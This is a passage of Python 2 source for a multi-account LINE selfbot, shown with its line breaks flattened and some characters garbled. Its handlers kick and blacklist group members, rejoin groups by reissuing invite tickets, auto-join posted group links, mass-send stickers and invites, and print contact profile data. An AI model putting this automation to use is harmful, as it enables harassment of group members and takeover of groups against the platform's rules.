random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) if op.type == 17: group = random.choice(KAC).getGroup(op.param1) cb = Message() cb.to = op.param1 cb.text = 
random.choice(KAC).getContact(op.param2).displayName + " [NewMemb]\n\nSelamat Datang" + random.choice(KAC).getContact(op.param2).displayName + " di [" + group.name + "]\nJangan Spam ya" + "\n\nCreator Group => " + group.creator.displayName random.choice(KAC).sendMessage(cb) if op.type == 15: if op.param2 in Bots: return ki.sendText(op.param1, random.choice(KAC).getContact(op.param2).displayName + " Good Bye Kaka" ) print "MemberLeft" if op.type == 13: if op.param3 in mid: if op.param2 in Amid: G = ki.getGroup(op.param1) G.preventJoinByTicket = False ki.updateGroup(G) Ticket = ki.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki.updateGroup(G) Ticket = ki.reissueGroupTicket(op.param1) if op.param3 in Amid: if op.param2 in Bmid: X = kk.getGroup(op.param1) X.preventJoinByTicket = False kk.updateGroup(X) Ti = kk.reissueGroupTicket(op.param1) ki.acceptGroupInvitationByTicket(op.param1,Ti) X.preventJoinByTicket = True kk.updateGroup(X) Ti = kk.reissueGroupTicket(op.param1) if op.param3 in Bmid: if op.param2 in Cmid: X = kc.getGroup(op.param1) X.preventJoinByTicket = False kc.updateGroup(X) Ti = kc.reissueGroupTicket(op.param1) kk.acceptGroupInvitationByTicket(op.param1,Ti) X.preventJoinByTicket = True kc.updateGroup(X) Ti = kc.reissueGroupTicket(op.param1) if op.param3 in Cmid: if op.param2 in mid: X = cl.getGroup(op.param1) X.preventJoinByTicket = False cl.updateGroup(X) Ti = cl.reissueGroupTicket(op.param1) kc.acceptGroupInvitationByTicket(op.param1,Ti) X.preventJoinByTicket = True cl.updateGroup(X) Ti = cl.reissueGroupTicket(op.param1) if op.type == 13: print op.param1 print op.param2 print op.param3 if mid in op.param3: G = cl.getGroup(op.param1) if wait["autoJoin"] == True: if wait["autoCancel"]["on"] == True: if len(G.members) <= wait["autoCancel"]["members"]: cl.rejectGroupInvitation(op.param1) else: cl.acceptGroupInvitation(op.param1) else: cl.acceptGroupInvitation(op.param1) elif wait["autoCancel"]["on"] == True: if len(G.members) <= wait["autoCancel"]["members"]: cl.rejectGroupInvitation(op.param1) else: Inviter = op.param3.replace("",',') InviterX = Inviter.split(",") matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, InviterX) if matched_list == []: pass else: cl.cancelGroupInvitation(op.param1, matched_list) if op.type == 19: if mid in op.param3: if op.param2 in Bots: pass try: ki.kickoutFromGroup(op.param1,[op.param2]) except: try: random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) except: print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。") if op.param2 in wait["blacklist"]: pass if op.param2 in wait["whitelist"]: pass else: wait["blacklist"][op.param2] = True G = ki.getGroup(op.param1) G.preventJoinByTicket = False ki.updateGroup(G) Ti = ki.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ti) ki.acceptGroupInvitationByTicket(op.param1,Ti) kk.acceptGroupInvitationByTicket(op.param1,Ti) kc.acceptGroupInvitationByTicket(op.param1,Ti) X = cl.getGroup(op.param1) X.preventJoinByTicket = True cl.updateGroup(X) Ti = cl.reissueGroupTicket(op.param1) if op.param2 in wait["blacklist"]: pass if op.param2 in wait["whitelist"]: pass else: wait["blacklist"][op.param2] = True if Amid in op.param3: if op.param2 in Bots: pass try: kk.kickoutFromGroup(op.param1,[op.param2]) kc.kickoutFromGroup(op.param1,[op.param2]) except: try: 
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) except: print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。") if op.param2 in wait["blacklist"]: pass if op.param2 in wait["whitelist"]: pass else: wait["blacklist"][op.param2] = True X = kk.getGroup(op.param1) X.preventJoinByTicket = False cl.updateGroup(X) Ti = kk.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ti) ki.acceptGroupInvitationByTicket(op.param1,Ti) kk.acceptGroupInvitationByTicket(op.param1,Ti) G = ki.getGroup(op.param1) G.preventJoinByTicket = True ki.updateGroup(G) Ticket = ki.reissueGroupTicket(op.param1) if op.param2 in wait["blacklist"]: pass if op.param2 in wait["whitelist"]: pass else: wait["blacklist"][op.param2] = True if Bmid in op.param3: if op.param2 in Bots: pass try: kc.kickoutFromGroup(op.param1,[op.param2]) kk.kickoutFromGroup(op.param1,[op.param2]) except: try: random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) except: print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。") if op.param2 in wait["blacklist"]: pass if op.param2 in wait["whitelist"]: pass else: wait["blacklist"][op.param2] = True X = kc.getGroup(op.param1) X.preventJoinByTicket = False kc.updateGroup(X) Ti = kc.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ti) ki.acceptGroupInvitationByTicket(op.param1,Ti) kk.acceptGroupInvitationByTicket(op.param1,Ti) kc.acceptGroupInvitationByTicket(op.param1,Ti) G = kk.getGroup(op.param1) G.preventJoinByTicket = True kk.updateGroup(G) Ticket = kk.reissueGroupTicket(op.param1) if op.param2 in wait["blacklist"]: pass if op.param2 in wait["whitelist"]: pass else: wait["blacklist"][op.param2] = True if Cmid in op.param3: if op.param2 in Bots: pass try: cl.kickoutFromGroup(op.param1,[op.param2]) kk.kickoutFromGroup(op.param1,[op.param2]) except: try: random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) except: print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。") if op.param2 in wait["blacklist"]: pass if op.param2 in wait["whitelist"]: pass else: wait["blacklist"][op.param2] = True X = cl.getGroup(op.param1) X.preventJoinByTicket = False cl.updateGroup(X) Ti = cl.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ti) ki.acceptGroupInvitationByTicket(op.param1,Ti) kk.acceptGroupInvitationByTicket(op.param1,Ti) kc.acceptGroupInvitationByTicket(op.param1,Ti) G = kc.getGroup(op.param1) G.preventJoinByTicket = True kc.updateGroup(G) Ticket = kc.reissueGroupTicket(op.param1) if op.param2 in wait["blacklist"]: pass if op.param2 in wait["whitelist"]: pass else: wait["blacklist"][op.param2] = True if op.type == 13: if mid in op.param3: G = cl.getGroup(op.param1) if wait["autoJoin"] == True: if wait["autoCancel"]["on"] == True: if len(G.members) <= wait["autoCancel"]["members"]: cl.rejectGroupInvitation(op.param1) else: cl.acceptGroupInvitation(op.param1) else: cl.acceptGroupInvitation(op.param1) elif wait["autoCancel"]["on"] == True: if len(G.members) <= wait["autoCancel"]["members"]: cl.rejectGroupInvitation(op.param1) else: Inviter = op.param3.replace("",',') InviterX = Inviter.split(",") matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, InviterX) if matched_list == []: pass else: cl.cancelGroupInvitation(op.param1, matched_list) if op.type == 22: if wait["leaveRoom"] == True: cl.leaveRoom(op.param1) if op.type == 24: if 
wait["leaveRoom"] == True: cl.leaveRoom(op.param1) if op.type == 25: msg = op.message if msg.toType == 0: msg.to = msg.from_ if msg.from_ == profile.mid: if "join:" in msg.text: list_ = msg.text.split(":") try: cl.acceptGroupInvitationByTicket(list_[1],list_[2]) X = cl.getGroup(list_[1]) X.preventJoinByTicket = True cl.updateGroup(X) except: cl.sendText(msg.to,"error") if msg.toType == 1: if wait["leaveRoom"] == True: cl.leaveRoom(msg.to) if msg.contentType == 16: url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post") cl.like(url[25:58], url[66:], likeType=1001) if op.type == 25: msg = op.message if msg.contentType == 13: if wait["wblack"] == True: if msg.contentMetadata["mid"] in wait["commentBlack"]: cl.sendText(msg.to,"already") wait["wblack"] = False else: wait["commentBlack"][msg.contentMetadata["mid"]] = True wait["wblack"] = False cl.sendText(msg.to,"decided not to comment") elif wait["dblack"] == True: if msg.contentMetadata["mid"] in wait["commentBlack"]: del wait["commentBlack"][msg.contentMetadata["mid"]] cl.sendText(msg.to,"deleted") ki.sendText(msg.to,"deleted") kk.sendText(msg.to,"deleted") kc.sendText(msg.to,"deleted") wait["dblack"] = False else: wait["dblack"] = False cl.sendText(msg.to,"It is not in the black list") ki.sendText(msg.to,"It is not in the black list") kk.sendText(msg.to,"It is not in the black list") kc.sendText(msg.to,"It is not in the black list") elif wait["wblacklist"] == True: if msg.contentMetadata["mid"] in wait["blacklist"]: cl.sendText(msg.to,"already") ki.sendText(msg.to,"already") kk.sendText(msg.to,"already") kc.sendText(msg.to,"already") wait["wblacklist"] = False else: wait["blacklist"][msg.contentMetadata["mid"]] = True wait["wblacklist"] = False cl.sendText(msg.to,"aded") ki.sendText(msg.to,"aded") kk.sendText(msg.to,"aded") kc.sendText(msg.to,"aded") elif wait["dblacklist"] == True: if msg.contentMetadata["mid"] in wait["blacklist"]: del wait["blacklist"][msg.contentMetadata["mid"]] cl.sendText(msg.to,"deleted") ki.sendText(msg.to,"deleted") kk.sendText(msg.to,"deleted") kc.sendText(msg.to,"deleted") wait["dblacklist"] = False else: wait["dblacklist"] = False cl.sendText(msg.to,"It is not in the black list") ki.sendText(msg.to,"It is not in the black list") kk.sendText(msg.to,"It is not in the black list") kc.sendText(msg.to,"It is not in the black list") elif wait["contact"] == True: msg.contentType = 0 cl.sendText(msg.to,msg.contentMetadata["mid"]) if 'displayName' in msg.contentMetadata: contact = cl.getContact(msg.contentMetadata["mid"]) try: cu = cl.channel.getCover(msg.contentMetadata["mid"]) except: cu = "" cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu)) else: contact = cl.getContact(msg.contentMetadata["mid"]) try: cu = cl.channel.getCover(msg.contentMetadata["mid"]) except: cu = "" cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu)) elif msg.contentType == 16: if wait["timeline"] == True: msg.contentType = 0 if wait["lang"] == "JP": msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"] else: msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"] 
cl.sendText(msg.to,msg.text) elif msg.text is None: return elif msg.text in ["Key","help","Help"]: if msg.from_ in admin: if wait["lang"] == "JP": cl.sendText(msg.to,helpMessage) else: cl.sendText(msg.to,helpt) elif msg.text in ["Invite:on"]: if msg.from_ in admin: wait["winvite"] = True cl.sendText(msg.to,"send contact") elif ("Gn " in msg.text): if msg.from_ in admin: if msg.toType == 2: X = cl.getGroup(msg.to) X.name = msg.text.replace("Gn ","") cl.updateGroup(X) else: cl.sendText(msg.to,"It can't be used besides the group.") elif ("Cv1 gn " in msg.text): if msg.from_ in admin: if msg.toType == 2: X = cl.getGroup(msg.to) X.name = msg.text.replace("Cv1 gn ","") ki.updateGroup(X) else: ki.sendText(msg.to,"It can't be used besides the group.") elif ("Cv2 gn " in msg.text): if msg.from_ in admin: if msg.toType == 2: X = cl.getGroup(msg.to) X.name = msg.text.replace("Cv2 gn ","") kk.updateGroup(X) else: kk.sendText(msg.to,"It can't be used besides the group.") elif ("Cv3 gn " in msg.text): if msg.from_ in admin: if msg.toType == 2: X = cl.getGroup(msg.to) X.name = msg.text.replace("Cv3 gn ","") kc.updateGroup(X) else: kc.sendText(msg.to,"It can't be used besides the group.") elif "Kick " in msg.text: if msg.from_ in admin: midd = msg.text.replace("Kick ","") cl.kickoutFromGroup(msg.to,[midd]) elif "Cv1 kick " in msg.text: if msg.from_ in admin: midd = msg.text.replace("Cv1 kick ","") ki.kickoutFromGroup(msg.to,[midd]) elif "Cv2 kick " in msg.text: if msg.from_ in admin: midd = msg.text.replace("Cv2 kick ","") kk.kickoutFromGroup(msg.to,[midd]) elif "Cv3 kick " in msg.text: if msg.from_ in admin: midd = msg.text.replace("Cv3 kick ","") kc.kickoutFromGroup(msg.to,[midd]) elif "Invite " in msg.text: if msg.from_ in admin: midd = msg.text.replace("Invite ","") cl.findAndAddContactsByMid(midd) cl.inviteIntoGroup(msg.to,[midd]) elif "Cv1 invite " in msg.text: if msg.from_ in admin: midd = msg.text.replace("Cv1 invite ","") ki.findAndAddContactsByMid(midd) ki.inviteIntoGroup(msg.to,[midd]) elif "Cv2 invite " in msg.text: if msg.from_ in admin: midd = msg.text.replace("Cv2 invite ","") kk.findAndAddContactsByMid(midd) kk.inviteIntoGroup(msg.to,[midd]) elif "Cv3 invite " in msg.text: if msg.from_ in admin: midd = msg.text.replace("Cv3 invite ","") kc.findAndAddContactsByMid(midd) kc.inviteIntoGroup(msg.to,[midd]) elif msg.text in ["Me"]: if msg.from_ in admin: msg.contentType = 13 msg.contentMetadata = {'mid': mid} cl.sendMessage(msg) elif msg.text in ["Cv1"]: if msg.from_ in admin: msg.contentType = 13 msg.contentMetadata = {'mid': Amid} ki.sendMessage(msg) elif msg.text in ["Cv2"]: if msg.from_ in admin: msg.contentType = 13 msg.contentMetadata = {'mid': Bmid} kk.sendMessage(msg) elif msg.text in ["愛のプレゼント","Gift"]: if msg.from_ in admin: msg.contentType = 9 msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '5'} msg.text = None cl.sendMessage(msg) elif msg.text in ["愛のプレゼント","Cv1 gift"]: if msg.from_ in admin: msg.contentType = 9 msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'} msg.text = None ki.sendMessage(msg) elif msg.text in ["愛のプレゼント","Cv2 gift"]: if msg.from_ in admin: msg.contentType = 9 msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '8'} msg.text = None kk.sendMessage(msg) elif msg.text in ["愛のプレゼント","Cv3 gift"]: if msg.from_ in admin: msg.contentType = 9 msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 
'PRDTYPE': 'THEME', 'MSGTPL': '10'} msg.text = None kc.sendMessage(msg) elif msg.text in ["愛のプレゼント","All gift"]: if msg.from_ in admin: msg.contentType = 9 msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '12'} msg.text = None ki.sendMessage(msg) kk.sendMessage(msg) kc.sendMessage(msg) elif msg.text in ["cancel","Cancel"]: if msg.from_ in admin: if msg.toType == 2: X = cl.getGroup(msg.to) if X.invitee is not None: gInviMids = [contact.mid for contact in X.invitee] cl.cancelGroupInvitation(msg.to, gInviMids) else: if wait["lang"] == "JP": cl.sendText(msg.to,"No one is inviting") else: cl.sendText(msg.to,"Sorry, nobody absent") else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can not be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv cancel","Bot cancel"]: if msg.from_ in admin: if msg.toType == 2: G = k3.getGroup(msg.to) if G.invitee is not None: gInviMids = [contact.mid for contact in G.invitee] k3.cancelGroupInvitation(msg.to, gInviMids) else: if wait["lang"] == "JP": k3.sendText(msg.to,"No one is inviting") else: k3.sendText(msg.to,"Sorry, nobody absent") else: if wait["lang"] == "JP": k3.sendText(msg.to,"Can not be used outside the group") else: k3.sendText(msg.to,"Not for use less than group") #elif "gurl" == msg.text: #print cl.getGroup(msg.to) ##cl.sendMessage(msg) elif msg.text in ["Ourl","Link on","Urlon"]: if msg.from_ in admin: if msg.toType == 2: X = cl.getGroup(msg.to) X.preventJoinByTicket = False cl.updateGroup(X) if wait["lang"] == "JP": cl.sendText(msg.to,"Done") else: cl.sendText(msg.to,"already open") else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can not be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv1 ourl","Cv1 link on"]: if msg.from_ in admin: if msg.toType == 2: X = cl.getGroup(msg.to) X.preventJoinByTicket = False ki.updateGroup(X) if wait["lang"] == "JP": ki.sendText(msg.to,"Done Chivas") else: ki.sendText(msg.to,"already open") else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can not be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv2 ourl","Cv2 link on"]: if msg.from_ in admin: if msg.toType == 2: X = kk.getGroup(msg.to) X.preventJoinByTicket = False kk.updateGroup(X) if wait["lang"] == "JP": kk.sendText(msg.to,"Done Chivas") else: kk.sendText(msg.to,"already open") else: if wait["lang"] == "JP": kk.sendText(msg.to,"Can not be used outside the group") else: kk.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv3 ourl","Cv3 link on"]: if msg.from_ in admin: if msg.toType == 2: X = kc.getGroup(msg.to) X.preventJoinByTicket = False kc.updateGroup(X) if wait["lang"] == "JP": kc.sendText(msg.to,"Done Chivas") else: kc.sendText(msg.to,"already open") else: if wait["lang"] == "JP": kc.sendText(msg.to,"Can not be used outside the group") else: kc.sendText(msg.to,"Not for use less than group") elif msg.text in ["Curl","Link off","Urloff"]: if msg.from_ in admin: if msg.toType == 2: X = cl.getGroup(msg.to) X.preventJoinByTicket = True cl.updateGroup(X) if wait["lang"] == "JP": cl.sendText(msg.to,"Done") else: cl.sendText(msg.to,"already close") else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can not be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv1 curl","Cv1 link off"]: if msg.from_ in admin: if msg.toType == 2: X = ki.getGroup(msg.to) X.preventJoinByTicket = True 
ki.updateGroup(X) if wait["lang"] == "JP": ki.sendText(msg.to,"Done Chivas") else: ki.sendText(msg.to,"already close") else: if wait["lang"] == "JP": ki.sendText(msg.to,"Can not be used outside the group") else: ki.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv2 curl","Cv2 link off"]: if msg.from_ in admin: if msg.toType == 2: X = kk.getGroup(msg.to) X.preventJoinByTicket = True kk.updateGroup(X) if wait["lang"] == "JP": kk.sendText(msg.to,"Done Chivas") else: kk.sendText(msg.to,"already close") else: if wait["lang"] == "JP": kk.sendText(msg.to,"Can not be used outside the group") else: kk.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv3 curl","Cv3 link off"]: if msg.from_ in admin: if msg.toType == 2: X = kc.getGroup(msg.to) X.preventJoinByTicket = True kc.updateGroup(X) if wait["lang"] == "JP": kc.sendText(msg.to,"Done Chivas") else: kc.sendText(msg.to,"already close") else: if wait["lang"] == "JP": kc.sendText(msg.to,"Can not be used outside the group") else: kc.sendText(msg.to,"Not for use less than group") elif "jointicket " in msg.text.lower(): rplace=msg.text.lower().replace("jointicket ") if rplace == "on": wait["atjointicket"]=True elif rplace == "off": wait["atjointicket"]=False cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"])) elif '/ti/g/' in msg.text.lower(): link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?') links = link_re.findall(msg.text) n_links=[] for l in links: if l not in n_links: n_links.append(l) for ticket_id in n_links: if wait["atjointicket"] == True: group=cl.findGroupByTicket(ticket_id) cl.acceptGroupInvitationByTicket(group.mid,ticket_id) cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name)) elif msg.text == "Ginfo": if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: gCreator = ginfo.creator.displayName except: gCreator = "Error" if wait["lang"] == "JP": if ginfo.invitee is None: sinvitee = "0" else: sinvitee = str(len(ginfo.invitee)) if ginfo.preventJoinByTicket == True: u = "close" else: u = "open" cl.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\nmembers:" + str(len(ginfo.members)) + "members\npending:" + sinvitee + "people\nURL:" + u + "it is inside") else: cl.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus) else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can not be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif "Id" == msg.text: if msg.from_ in admin: cl.sendText(msg.to,msg.to) elif "All mid" == msg.text: if msg.from_ in admin: cl.sendText(msg.to,mid) ki.sendText(msg.to,Amid) kk.sendText(msg.to,Bmid) kc.sendText(msg.to,Cmid) elif "Mid" == msg.text: if msg.from_ in admin: cl.sendText(msg.to,mid) elif "Cv1 mid" == msg.text: if msg.from_ in admin: ki.sendText(msg.to,Amid) elif "Cv2 mid" == msg.text: if msg.from_ in admin: kk.sendText(msg.to,Bmid) elif "Cv3 mid" == msg.text: if msg.from_ in admin: kc.sendText(msg.to,Cmid) elif msg.text in ["Wkwk"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "100", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["Hehehe"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { 
"STKID": "10", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["Galon"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "9", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["You"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "7", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["Hadeuh"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "6", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["Please"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "4", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["Haaa"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "3", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["Lol"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "110", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["Hmmm"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "101", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) elif msg.text in ["Wc"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "247", "STKPKGID": "3", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["TL:"]: if msg.from_ in admin: tl_text = msg.text.replace("TL:","") cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"]) elif msg.text in ["Cn "]: if msg.from_ in admin: string = msg.text.replace("Cn ","") if len(string.decode('utf-8')) <= 20: profile = cl.getProfile() profile.displayName = string cl.updateProfile(profile) cl.sendText(msg.to,"name " + string + " done") elif msg.text in ["Cv1 rename "]: if msg.from_ in admin: string = msg.text.replace("Cv1 rename ","") if len(string.decode('utf-8')) <= 20: profile_B = ki.getProfile() profile_B.displayName = string ki.updateProfile(profile_B) ki.sendText(msg.to,"name " + string + " done") elif msg.text in ["Cv2 rename "]: if msg.from_ in admin: string = msg.text.replace("Cv2 rename ","") if len(string.decode('utf-8')) <= 20: profile_B = kk.getProfile() profile_B.displayName = string kk.updateProfile(profile_B) kk.sendText(msg.to,"name " + string + " done") elif msg.text in ["Mc "]: if msg.from_ in admin: mmid = msg.text.replace("Mc ","") msg.contentType = 13 msg.contentMetadata = {"mid":mmid} cl.sendMessage(msg) elif msg.text in ["連絡先:オン","K on","Contact on","顯示:開"]: if msg.from_ in admin: if wait["contact"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"already on") else: cl.sendText(msg.to,"done") else: wait["contact"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"already on") else: cl.sendText(msg.to,"done") elif msg.text in ["連絡先:オフ","K off","Contact off","顯示:關"]: if msg.from_ in admin: if wait["contact"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"already off") else: cl.sendText(msg.to,"done ") else: wait["contact"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"already off") else: cl.sendText(msg.to,"done") elif msg.text.lower() == 'protect on': if wait["protect"] == True: if 
wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah on 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈") else: wait["protect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"already ON􀜁􀇔􏿿") else: cl.sendText(msg.to,"It is already On ô€¨") elif msg.text.lower() == 'qrprotect on': if wait["linkprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah on 􀜁􀇔��👈") else: cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈") else: wait["linkprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"already ON􀜁􀇔􏿿") else: cl.sendText(msg.to,"It is already On ô€¨") elif msg.text.lower() == 'inviteprotect on': if wait["inviteprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah on 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨����👈") else: wait["inviteprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"already ON􀜁􀇔􏿿") else: cl.sendText(msg.to,"It is already On ô€¨") elif msg.text.lower() == 'cancelprotect on': if wait["cancelprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah on 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈") else: wait["cancelprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"already ON􀜁􀇔􏿿") else: cl.sendText(msg.to,"It is already On ô€¨") elif msg.text.lower() == 'auto join on': if wait["autoJoin"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah off 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈") else: wait["autoJoin"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"already ON􀜁􀇔􏿿") else: cl.sendText(msg.to,"It is already On ô€¨") elif msg.text.lower() == 'blocklist': blockedlist = cl.getBlockedContactIds() cl.sendText(msg.to, "Please wait...") kontak = cl.getContacts(blockedlist) num=1 msgs="User Blocked List\n" for ids in kontak: msgs+="\n%i. 
%s" % (num, ids.displayName) num=(num+1) msgs+="\n\nTotal %i blocked user(s)" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Allprotect on","Panick:on"]: if msg.from_ in admin: if wait["inviteprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah on 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Already on") else: wait["inviteprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protect invite on 􀜁􀇔􏿿") if wait["cancelprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah on 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Already on") else: wait["cancelprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protect cancel on 􀜁􀇔􏿿") if wait["protect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah on 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Already on") else: wait["protect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protect on 􀜁􀇔􏿿") else: cl.sendText(msg.to,"Already on") if wait["linkprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah on 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Already on") else: wait["linkprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protect QR on 􀜁􀇔􏿿") else: cl.sendText(msg.to,"Already on") elif msg.text in ["Allprotect off","Panick:off"]: if msg.from_ in admin: if wait["inviteprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah off 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Already off") else: wait["inviteprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protect invite off 􀜁􀇔􏿿") if wait["cancelprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah off 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Already off") else: wait["cancelprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protect cancel off 􀜁􀇔􏿿") if wait["protect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah off 􀜁􀇔􏿿👈") else: 